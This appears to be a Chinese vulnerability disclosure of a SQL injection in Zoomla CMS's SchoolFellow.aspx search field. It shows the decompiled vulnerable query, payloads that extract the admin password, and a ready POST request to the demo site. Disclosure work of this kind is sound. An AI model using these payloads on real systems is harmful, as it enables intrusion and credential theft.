### 简要描述:
http://www.zoomla.cn/down/2242.shtml
20140725更新.
### 详细说明:
前台注册(新版集成了N多功能)并登陆,会员中心处,http://demo.zoomla.cn/User/UserZone/School/SchoolFellow.aspx,查找同学处存在注入.
```
/User/UserZone/School/SchoolFellow.aspx
<%@ page language="C#" autoeventwireup="true" inherits="User_UserZone_School_SchoolFellow, App_Web_tgw2vs0x" enableEventValidation="false" viewStateEncryptionMode="Never" %>
```
反编译App_Web_tgw2vs0x.dll
```
App_Web_tgw2vs0x.User_UserZone_School_SchoolFellow
protected void Button1_Click(object sender, EventArgs e)
{
int num2;
DataTable table = this.st.Select_ByValue(" * ", " UserID in (select UserID from ZL_UserBase where TrueName like '%" + this.txtName.Text + "%') ", "");
```
search型注入.
z%' and @@version>0 and '%'='
z%' and (select top 1 AdminPassword from ZL_Manager)>0 and '%'='(管理员密码)
http://demo.zoomla.cn/User/UserZone/School/SchoolFellow.aspx
POST:
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKMTE0Nzc4NjkwNw9kFgICAw9kFgZmDw8WAh4EVGV4dAUJ6YCQ5rWqQ01TZGQCBQ9kFgICAQ88KwARAgEQFgAWABYADBQrAABkAg4PEGRkFgBkGAEFCUdyaWRWaWV3MQ9nZAfHrsmckVbLrrqqyYKBUUsyOWBm1AJUg2fMuuagtd6u&txtName=2013*(注入点)&Button1=%E6%9F%A5++%E6%89%BE
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201408/02111038c645d622cf5c8d8a8f864d0205ca772d.jpg" alt="080201.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/02111038c645d622cf5c8d8a8f864d0205ca772d.jpg)
[<img src="https://images.seebug.org/upload/201408/021110542e8237f2cc2b30f9009002e13c91ea41.jpg" alt="080202.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/021110542e8237f2cc2b30f9009002e13c91ea41.jpg)
暂无评论